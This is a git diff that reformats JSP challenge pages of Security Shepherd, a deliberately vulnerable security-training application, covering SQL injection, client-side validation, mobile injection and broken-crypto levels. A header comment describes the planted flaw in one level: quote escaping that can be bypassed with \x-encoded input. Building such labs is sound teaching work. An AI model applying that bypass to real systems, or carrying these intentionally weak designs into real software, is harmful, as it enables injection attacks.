+				<!-- Apple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/apple.jpg" /></td>
+					<td>$45</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfApples" autocomplete="off" />
+				</tr>
+				<!-- Banana Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/banana.jpg" /></td>
+					<td>$15</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfBananas" autocomplete="off" />
+				</tr>
+				<!-- Orange Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/orange.jpg" /></td>
+					<td>$3000</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfOranges" autocomplete="off" />
+				</tr>
+				<!-- Pineapple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/pineapple.png" /></td>
+					<td>$30</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfPineapples" autocomplete="off" />
+				</tr>
+			</table>
 
-        <%=bundle.getString("poorValidation.howToShop")%>
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%=bundle.getString("poorValidation.placeOrder")%>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%=bundle.getString("poorValidation.loading")%>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+			<%=bundle.getString("poorValidation.howToShop")%>
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%=bundle.getString("poorValidation.placeOrder")%>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%=bundle.getString("poorValidation.loading")%></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var thePineappleAmount = $("#numberOfPineapples").val();
-        var theOrangeAmount = $("#numberOfOranges").val();
-        var theAppleAmount = $("#numberOfApples").val();
-        var theBananaAmount = $("#numberOfBananas").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%=levelHash%>",
-                data: {
-                    pineappleAmount: thePineappleAmount,
-                    orangeAmount: theOrangeAmount,
-                    appleAmount: theAppleAmount,
-                    bananaAmount: theBananaAmount
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%=bundle.getString("error.occurred")%>: "
-                    + ajaxCall.status + " "
-                    + ajaxCall.statusText
-                    + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var thePineappleAmount = $("#numberOfPineapples").val();
+				var theOrangeAmount = $("#numberOfOranges").val();
+				var theAppleAmount = $("#numberOfApples").val();
+				var theBananaAmount = $("#numberOfBananas").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%=levelHash%>",
+						data: {
+							pineappleAmount: thePineappleAmount, 
+							orangeAmount: theOrangeAmount,
+							appleAmount: theAppleAmount, 
+							bananaAmount: theBananaAmount
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%=bundle.getString("error.occurred")%>: "
+													+ ajaxCall.status + " "
+													+ ajaxCall.statusText
+													+ "</p>");
+								}
+								$("#resultsDiv").show("slow", function() {
+									$("#loadingSign").hide("fast", function() {
+										$("#submitButton").show("slow");
+									});
+								});
+							});
+				});
+	</script>
 
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	} else {
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	} else {
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425.jsp b/src/main/webapp/challenges/cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425.jsp
index 7a9d1576b..b39a1a231 100644
--- a/src/main/webapp/challenges/cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425.jsp
+++ b/src/main/webapp/challenges/cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425.jsp
@@ -1,146 +1,153 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Client Side Injection 2";
+String levelName = "Mobile Client Side Injection 2";
 //Alphanumeric Only
-    String levelHash = "cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425";
+String levelHash = "cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.clientSideInjection.clientSideInjection", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.clientSideInjection.clientSideInjection", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge2.challengeName");
-    String paragraph1 = bundle.getString("challenge2.para1");
+String LevelName = bundle.getString("challenge2.challengeName");
+String paragraph1 = bundle.getString("challenge2.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= LevelName %>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " CSInjection2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= LevelName %></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " CSInjection2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-        <% /* IF you need a form - Present it like this */ %>
-        <%
-            /*
-            <br />
-            <br />
-            <form id="leForm" action="javascript:;">
-                <table>
-                <tr><td>
-                    <div id="submitButton">
-                    <input type="submit" value="Get Info"/></div>
-                    <p style="display: none;" id="loadingSign">Loading...</p>
-                    <div style="display: none;" id="hintButton"><input type="button" value="Would you like a hint?" id="theHintButton"/></div>
-                </td></tr>
-                </table>
-            </form>
-
-            <div id="resultsDiv"></div>
-            */
-        %>
-    </p>
-</div>
-<% /*If you need to call the Server Do it like this */ %>
-<%
-    /*
-    <script>
-        $("#leForm").submit(function(){
-            var theVariableName = $("#variableName").val();
-            var theSecondVariableName = $("#secondVariableName").val();
-            $("#submitButton").hide("fast");
-            $("#loadingSign").show("slow");
-            $("#resultsDiv").hide("slow", function(){
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "<ChangeThis= levelHash ChangeThis>",
-                    data: {
-                        variableName: theVariableName,
-                        secondVariableName: theSecondVariableName
-                    },
-                    async: false
-                });
-                if(ajaxCall.status == 200)
-                {
-                    $("#resultsDiv").html(ajaxCall.responseText);
-                }
-                else
-                {
-                    $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#resultsDiv").show("slow", function(){
-                    $("#loadingSign").hide("fast", function(){
-                        $("#submitButton").show("slow");
-                    });
-                });
-            });
-        });
-    </script>
-    */
-%>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			<% /* IF you need a form - Present it like this */ %>
+			<%
+				/*
+				<br />
+				<br />
+				<form id="leForm" action="javascript:;">
+					<table>
+					<tr><td>			
+						<div id="submitButton">
+						<input type="submit" value="Get Info"/></div>
+						<p style="display: none;" id="loadingSign">Loading...</p>
+						<div style="display: none;" id="hintButton"><input type="button" value="Would you like a hint?" id="theHintButton"/></div>
+					</td></tr>
+					</table>
+				</form>
+				
+				<div id="resultsDiv"></div>
+				*/
+				%>
+		</p>
+	</div>
+	<% /*If you need to call the Server Do it like this */ %>
+	<%
+		/*
+		<script>
+			$("#leForm").submit(function(){
+				var theVariableName = $("#variableName").val();
+				var theSecondVariableName = $("#secondVariableName").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<ChangeThis= levelHash ChangeThis>",
+						data: {
+							variableName: theVariableName, 
+							secondVariableName: theSecondVariableName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+		*/
+		%>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.jsp b/src/main/webapp/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.jsp
index 87574af7f..e04e79587 100644
--- a/src/main/webapp/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.jsp
+++ b/src/main/webapp/challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2.jsp
@@ -1,149 +1,156 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * SQL Injection Challenge 6
-     * <br>
-     * System escapes single quotes but then interprets \x encoding.
-     *  So the encoding can be bypassed by encoding the attack vector in \x encoding
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * SQL Injection Challenge 6
+ * <br>
+ * System escapes single quotes but then interprets \x encoding.
+ *  So the encoding can be bypassed by encoding the attack vector in \x encoding
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "SQL Injection Challenge 6";
+String levelName = "SQL Injection Challenge 6";
 //Alphanumeric Only
-    String levelHash = "d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2";
+String levelHash = "d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2";
 //Level blurb can be writen here in HTML OR go into the HTML body and write it there. Nobody will update this but you
-    String levelBlurb = "Download the file and play with it to extract the key for this level!";
+String levelBlurb = "Download the file and play with it to extract the key for this level!";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/> <br/>
-    <h3><%= bundle.getString("challenge.description.h3") %>
-    </h3>
-    <p><%= bundle.getString("challenge.description.p") %>
-    </p>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.pinNumber") %>
-                </td>
-                <td><input type="password" id="pinNumber" maxlength="4"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td colspan="2">
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br /> <br />
+		<h3><%= bundle.getString("challenge.description.h3") %></h3>
+		<p><%= bundle.getString("challenge.description.p") %></p>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.pinNumber") %></td>
+					<td><input type="password" id="pinNumber" maxlength="4"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
+		<div id="resultsDiv"></div>
 
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var thePinNumber = $("#pinNumber").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    pinNumber: thePinNumber
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var thePinNumber = $("#pinNumber").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							pinNumber: thePinNumber
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/d2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717.jsp b/src/main/webapp/challenges/d2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717.jsp
index ec55da5f4..908079e5d 100644
--- a/src/main/webapp/challenges/d2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717.jsp
+++ b/src/main/webapp/challenges/d2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717.jsp
@@ -1,93 +1,100 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Broken Crypto 1";
+String levelName = "Mobile Broken Crypto 1";
 //Alphanumeric Only
-    String levelHash = "d2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717";
+String levelHash = "d2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717";
 
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.brokenCrypto.brokenCrypto", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.brokenCrypto.brokenCrypto", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge1.challengeName");
-    String paragraph1 = bundle.getString("challenge1.para1");
+String LevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
 
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
